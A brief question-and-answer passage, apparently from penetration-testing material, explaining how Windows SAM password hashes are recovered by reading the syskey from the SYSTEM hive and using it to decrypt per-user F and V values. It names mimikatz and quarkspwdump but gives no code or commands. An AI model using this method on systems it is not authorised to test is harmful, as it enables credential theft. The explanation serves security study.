What is the underlying principle behind extracting hashes from the SAM database?

The process involves two steps: first, read the syskey from `HKLM\SYSTEM` by concatenating values from specific registry keys. Second, use that syskey to decrypt the encrypted hash data stored in the `F` and `V` registry values under `HKLM\SAM\SAM\Domains\Account\Users` for each user. This decryption chain ensures that only someone with access to both hives can recover plaintext hashes. The full cryptographic logic is referenced in the code of tools like mimikatz and quarkspwdump, as outlined in Penetration Techniques - Obtaining Local User Hashes via SAM Database.